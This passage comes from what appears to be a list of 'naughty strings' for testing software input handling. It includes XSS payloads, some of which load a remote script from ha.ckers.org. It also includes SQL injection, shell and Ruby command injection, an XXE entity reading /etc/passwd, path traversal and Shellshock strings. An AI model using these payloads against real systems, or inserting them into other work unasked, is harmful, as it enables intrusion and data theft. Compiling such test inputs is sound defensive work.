| 485 | <img src\x09=x onerror="javascript:alert(1)"> |
| 486 | <img src\x10=x onerror="javascript:alert(1)"> |
| 487 | <img src\x13=x onerror="javascript:alert(1)"> |
| 488 | <img src\x32=x onerror="javascript:alert(1)"> |
| 489 | <img src\x12=x onerror="javascript:alert(1)"> |
| 490 | <img src\x11=x onerror="javascript:alert(1)"> |
| 491 | <img src\x00=x onerror="javascript:alert(1)"> |
| 492 | <img src\x47=x onerror="javascript:alert(1)"> |
| 493 | <img src=x\x09onerror="javascript:alert(1)"> |
| 494 | <img src=x\x10onerror="javascript:alert(1)"> |
| 495 | <img src=x\x11onerror="javascript:alert(1)"> |
| 496 | <img src=x\x12onerror="javascript:alert(1)"> |
| 497 | <img src=x\x13onerror="javascript:alert(1)"> |
| 498 | <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> |
| 499 | <img src=x onerror=\x09"javascript:alert(1)"> |
| 500 | <img src=x onerror=\x10"javascript:alert(1)"> |
| 501 | <img src=x onerror=\x11"javascript:alert(1)"> |
| 502 | <img src=x onerror=\x12"javascript:alert(1)"> |
| 503 | <img src=x onerror=\x32"javascript:alert(1)"> |
| 504 | <img src=x onerror=\x00"javascript:alert(1)"> |
| 505 | <a href=javascript:javascript:alert(1)>XXX</a> |
| 506 | <img src="x` `<script>javascript:alert(1)</script>"` `> |
| 507 | <img src onerror /" '"= alt=javascript:alert(1)//"> |
| 508 | <title onpropertychange=javascript:alert(1)></title><title title=> |
| 509 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> |
| 510 | <!--[if]><script>javascript:alert(1)</script --> |
| 511 | <!--[if<img src=x onerror=javascript:alert(1)//]> --> |
| 512 | <script src="/\%(jscript)s"></script> |
| 513 | <script src="\\%(jscript)s"></script> |
| 514 | <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
| 515 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
| 516 | <IMG SRC=# onmouseover="alert('xxs')"> |
| 517 | <IMG SRC= onmouseover="alert('xxs')"> |
| 518 | <IMG onmouseover="alert('xxs')"> |
| 519 | <IMG SRC=javascript:alert('XSS')> |
| 520 | <IMG SRC=javascript:alert('XSS')> |
| 521 | <IMG SRC=javascript:alert('XSS')> |
| 522 | <IMG SRC="jav ascript:alert('XSS');"> |
| 523 | <IMG SRC="jav	ascript:alert('XSS');"> |
| 524 | <IMG SRC="jav
ascript:alert('XSS');"> |
| 525 | <IMG SRC="jav
ascript:alert('XSS');"> |
| 526 | perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out |
| 527 | <IMG SRC="  javascript:alert('XSS');"> |
| 528 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
| 529 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
| 530 | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
| 531 | <<SCRIPT>alert("XSS");//<</SCRIPT> |
| 532 | <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
| 533 | <SCRIPT SRC=//ha.ckers.org/.j> |
| 534 | <IMG SRC="javascript:alert('XSS')" |
| 535 | <iframe src=http://ha.ckers.org/scriptlet.html < |
| 536 | \";alert('XSS');// |
| 537 | <u oncopy=alert()> Copy me</u> |
| 538 | <i onwheel=alert(1)> Scroll over me </i> |
| 539 | <plaintext> |
| 540 | http://a/%%30%30 |
| 541 | </textarea><script>alert(123)</script> |
| 542 | |
| 543 | # SQL Injection |
| 544 | # |
| 545 | # Strings which can cause a SQL injection if inputs are not sanitized |
| 546 | |
| 547 | 1;DROP TABLE users |
| 548 | 1'; DROP TABLE users-- 1 |
| 549 | ' OR 1=1 -- 1 |
| 550 | ' OR '1'='1 |
| 551 | |
| 552 | % |
| 553 | _ |
| 554 | |
| 555 | # Server Code Injection |
| 556 | # |
| 557 | # Strings which can cause the user to run code on the server as a privileged user (cf. https://news.ycombinator.com/item?id=7665153) |
| 558 | |
| 559 | - |
| 560 | -- |
| 561 | --version |
| 562 | --help |
| 563 | $USER |
| 564 | /dev/null; touch /tmp/blns.fail ; echo |
| 565 | `touch /tmp/blns.fail` |
| 566 | $(touch /tmp/blns.fail) |
| 567 | @{[system "touch /tmp/blns.fail"]} |
| 568 | |
| 569 | # Command Injection (Ruby) |
| 570 | # |
| 571 | # Strings which can call system commands within Ruby/Rails applications |
| 572 | |
| 573 | eval("puts 'hello world'") |
| 574 | System("ls -al /") |
| 575 | `ls -al /` |
| 576 | Kernel.exec("ls -al /") |
| 577 | Kernel.exit(1) |
| 578 | %x('ls -al /') |
| 579 | |
| 580 | # XXE Injection (XML) |
| 581 | # |
| 582 | # A string which can reveal system files when parsed by a badly configured XML parser |
| 583 | |
| 584 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> |
| 585 | |
| 586 | # Unwanted Interpolation |
| 587 | # |
| 588 | # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. |
| 589 | |
| 590 | $HOME |
| 591 | $ENV{'HOME'} |
| 592 | %d |
| 593 | %s |
| 594 | {0} |
| 595 | %*.*s |
| 596 | File:/// |
| 597 | |
| 598 | # File Inclusion |
| 599 | # |
| 600 | # Strings which can cause the user to pull in files that should not be part of a web server |
| 601 | |
| 602 | ../../../../../../../../../../../etc/passwd%00 |
| 603 | ../../../../../../../../../../../etc/hosts |
| 604 | |
| 605 | # Known CVEs and Vulnerabilities |
| 606 | # |
| 607 | # Strings that test for known vulnerabilities |
| 608 | |
| 609 | () { 0; }; touch /tmp/blns.shellshock1.fail; |
| 610 | () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } |
| 611 | <<< %s(un='%s') = %u |
| 612 | +++ATH0 |
| 613 | |
| 614 | # MSDOS/Windows Special Filenames |
| 615 | # |
| 616 | # Strings which are reserved filenames in MSDOS/Windows |
| 617 | |
| 618 | CON |
| 619 | PRN |
| 620 | AUX |
| 621 | CLOCK$ |
| 622 | NUL |
| 623 | A: |
| 624 | ZZ: |
| 625 | COM1 |
| 626 | LPT1 |
| 627 | LPT2 |
| 628 | LPT3 |
| 629 | COM2 |
| 630 | COM3 |
| 631 | COM4 |
| 632 | |
| 633 | # IRC specific strings |
| 634 | # |
| 635 | # Strings that may occur on IRC clients and make security products freak out |
| 636 | |
| 637 | DCC SEND STARTKEYLOGGER 0 0 0 |
| 638 | |
| 639 | # Scunthorpe Problem |
| 640 | # |
| 641 | # Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) |
| 642 | |
| 643 | Scunthorpe General Hospital |
| 644 | Penistone Community Church |
| 645 | Lightwater Country Park |
| 646 | Jimmy Clitheroe |
| 647 | Horniman Museum |
| 648 | shitake mushrooms |
| 649 | RomansInSussex.co.uk |
| 650 | http://www.cum.qc.ca/ |
| 651 | Craig Cockburn, Software Specialist |
| 652 | Linda Callahan |
| 653 | Dr. Herman I. Libshitz |
| 654 | magna cum laude |
| 655 | Super Bowl XXX |
| 656 | medieval erection of parapets |
| 657 | evaluate |
| 658 | mocha |
| 659 | expression |
| 660 | Arsenal canal |
| 661 | classic |
| 662 | Tyson Gay |
| 663 | Dick Van Dyke |
| 664 | basement |
| 665 | |
| 666 | # Human injection |
| 667 | # |
| 668 | # Strings which may cause a human to reinterpret their worldview |
| 669 | |
| 670 | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. |
| 671 | |
| 672 | # Terminal escape codes |
| 673 | # |
| 674 | # Strings which punish the fools who use cat/type on this file |
| 675 | |
| 676 | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue |
| 677 | But now...[20Cfor my greatest trick...[8m |
| 678 | The quick brown fox... [Beeeep] |
| 679 | |
| 680 | # iOS Vulnerabilities |
| 681 | # |
| 682 | # Strings which crashed iMessage in various versions of iOS |
| 683 | |
| 684 | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 |
| 685 | 🏳0🌈️ |